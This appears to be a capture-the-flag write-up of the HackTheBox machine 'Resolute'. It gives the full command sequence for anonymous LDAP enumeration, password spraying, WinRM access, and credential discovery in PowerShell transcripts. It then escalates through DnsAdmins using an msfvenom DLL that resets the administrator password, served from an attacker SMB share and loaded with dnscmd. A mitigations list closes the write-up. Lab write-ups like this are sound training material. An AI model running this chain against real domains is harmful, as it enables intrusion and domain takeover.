Resolute

Overview

Machine: Resolute Platform: HackTheBox Difficulty: Medium OS: Windows

This machine focuses on Active Directory enumeration and credential discovery (especially via LDAP and user data) leading to privilege escalation through misconfigurations like group memberships.

Kill Chain

  1. Anonymous LDAP Enumeration
  2. Credential Disclosure via LDAP User Attributes
  3. Password spraying → Initial Access
  4. Credential Discovery via PowerShell Transcripts
  5. Privilege Enumeration (DnsAdmins)
  6. Abuse of DNS Service Configuration → Privilege Escalation

Needed Tools

Recon

  • configure hosts entry
  • nmap scan of the machine
nmap -Pn resolute.htb

nmap nmap

nmap -sCV resolute.htb

nmap nmap

  • Perform anonymous LDAP enumeration to gather domain user information
ldapsearch -x -b "dc=megabank,dc=local" -H ldap://megabank.local

nmap nmap

LDAP allows unauthenticated queries in misconfigured environments, which can expose user objects and sensitive attributes as descriptions.

Enumeration

  • list user and descriptions with netexec
nxc ldap resolute.htb -u '' -p '' --users

nmap nmap

  • test the disclosed default password
nxc smb resolute.htb -u 'marko' -p '*****'

seems like the user changed the password already

Initial Access

  • create a user.txt as userlist
nxc ldap resolute.htb -u '' -p '' --users | grep -E '^[a-zA-Z]' | awk '{print $5}' > user.txt

nmap nmap

  • password spraying for all users
nxc smb resolute.htb -u user.txt -p '******'

nmap nmap

  • connect as user via winrm
evil-winrm -i resolute.htb -u '*****' -p '******'
  • get userflag
cat C:\Users\*****\Desktop\user.txt

Privilege escalation

  • Enumerate hidden directories using dir -force
cd C:\
dir -force
cd PSTranscripts\
dir -force
cd 20191203

nmap nmap

  • Analyze PowerShell transcript logs for potential credential disclosure
cat PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt

nmap nmap

  • get credentials of user ryan
  • connect as user ryan via winrm
evil-winrm -i resolute.htb -u 'ryan' -p '******'

nmap nmap

  • check the groups of user ryan
whoami /groups

Members of the DnsAdmins group can configure the DNS service, including loading arbitrary DLL plugins. nmap nmap

  • create evil dll with msfvenom
msfvenom -p windows/x64/exec cmd='net user administrator adminadmin /domain' -f dll -o evil.dll

nmap nmap

  • start impacket smbshare on client
sudo impacket-smbserver share .

nmap nmap

  • configure dns via dnscmd
dnscmd localhost /config /serverlevelplugindll \\$ip\share\evil.dll

nmap nmap

  • check the dnscmd config
dnscmd localhost /info /serverlevelplugindll

nmap nmap

  • restart dns on the server

The DNS service loads the configured plugin DLL upon restart, executing it with SYSTEM privileges.

sc.exe stop dns
sc.exe start dns

nmap nmap

  • connect as administrator via winrm
evil-winrm -i resolute.htb -u 'Administrator' -p '*****'

nmap nmap

  • read root.txt
cat C:\Users\Administrator\Desktop\root.txt

Possible Mitigation

  • Restrict anonymous LDAP access
  • Avoid storing credentials in plaintext
  • Secure Powershell logging mechanisms
  • Apply the principle of least privilege
  • Harden DNS service configuration